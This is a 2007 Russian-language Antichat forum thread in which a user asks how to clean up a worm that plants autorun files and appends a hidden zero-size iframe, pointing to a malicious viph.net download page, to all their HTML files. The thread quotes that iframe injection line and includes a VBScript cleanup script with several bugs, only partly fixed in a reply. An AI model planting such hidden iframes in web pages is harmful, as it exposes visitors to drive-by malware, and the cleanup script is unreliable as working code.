ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
20.08.2007, 22:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Вирь Win32:Agent-ITS
Вот попалса такой червяк.
Поставил автозапуск себе [setup.exe] на все локальные диски....Заражает exe. Сидит в памяти..
Я убил процес..потом del ето вирь..но не ето главное.
А Ищо копируетс в %windir%/system32/drivers/spoclsv.exe
Блин..но он заражает все html
т.к все html у меня зараж.
Он дописует в конце
PHP код:
<iframe src="http://[COLOR=Red]ww[/COLOR].viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
Что ето за ссылка?
И есть прога которая находила все *.htm\*.html и удаляла етот кусок?
----------------------
сенк всем заранее
__________________
BlackHat. MoDL
|
|
|
20.08.2007, 22:34
|
|
Участник форума
Регистрация: 24.06.2007
Сообщений: 259
Провел на форуме:
1018390
Репутация:
163
|
|
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
|
|
|
|
20.08.2007, 23:04
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374
Репутация:
124
|
|
2 Dimi4, проги скорее всего нету, можешь сам написать, найди исходник программы для поиска файлов, а вырезание строки сам допиши
|
|
|
|
20.08.2007, 23:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Стясняюсь спросить:
На каком языке исходник искать а то я не очень-то кодер...
А может можна там VBs, Js через ActiveX?
__________________
BlackHat. MoDL
|
|
|
|
20.08.2007, 23:49
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
Если не ошибаюсь, это вирь с автозаливом, или что о в этом роде... Его можно на сайтах поцепить.. сталкивался с таким червем... Лечить его не охота, переустановлю винду.
Порадовало. Под автозаливом понимается автоматический слив денег со счета холдера на счет владельца трояна. Наверное ты имел ввиду автораспространение, зупачу к примеру.
|
|
|
|
21.08.2007, 02:26
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374
Репутация:
124
|
|
2 Dimi4, написать можно на чем угодно, если надо на vbs то на сайте wilderwind.narod.ru есть пример вируса на vbs, который сносит все незанятые другими приложениями файлы на диске, его вобщем нетрудно переделать под поиск html файлов и их лечение
|
|
|
|
21.08.2007, 08:18
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Пройдщись хорошенько обновленным антивирусом (нод32 советую) в SafeMode.
AVZ - неплохо детектит "хитрые" вирусы. Вкупе с НОДом он попалит большинство поползновений виря.
Порченных HTML вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Еще лучше - переустанови винду. Вирмейкеры люди хитрые, может ты только верхушку айсберга видешь=)
__________________
...
|
|
|
|
21.08.2007, 10:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Порченных Html вряд ли у тебя так уж и много, так что обойдись руками, так быстрее будет.
Нет-уш...много у меня...
--------
нода нет..есть аваст.
Еще лучше - переустанови винду.
2дня назад переустанавлевал
__________________
BlackHat. MoDL
|
|
|
|
21.08.2007, 11:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
PHP код:
Set FSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = createobject("WScript.Shell")
'
Set TheFolder = FSO.GetFolder("D:\")
TheExtension = ".html"
TheExtension = UCase(TheExtension)
'
Sub WorkWithSubFolders(ByVal AFolder, ByVal TheExtension)
On Error Resume Next
Dim MoreFolders, TempFolder
Set MoreFolders = AFolder.SubFolders
For Each TempFolder In MoreFolders
WorkWithSubFolders TempFolder, TheExtension
Next
End Sub
'
Dim AFile, TheFiles
On Error Resume Next
Set TheFiles = AFolder.Files
For Each AFile In TheFiles
If UCase(FSO.GetExtensionName(AFile.Path)) = TheExtension Then
'''
dim oReg
set oReg = New RegExp
oReg.Global - true
oReg.IgnoreCase = true
oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
txt = oReg.Replace(txt, " ")
end if
Next
End Sub
'
WorkWithSubFolders TheFolder, TheExtension
Такой скрипт подойдет?
__________________
BlackHat. MoDL
|
|
|
|
27.08.2007, 21:20
|
|
Участник форума
Регистрация: 03.03.2007
Сообщений: 135
Провел на форуме:
833374
Репутация:
124
|
|
работать точно не будет из-за этой строки
PHP код:
oReg.Pattern = " <iframe src="http://ww.viph.net/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe> "
надо каждую кавычку заменить на две:
PHP код:
oReg.Pattern = " <iframe src=""http://ww.viph.net/wuhan/down.htm"" width=""0"" height=""0"" frameborder=""0""> </iframe> "
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
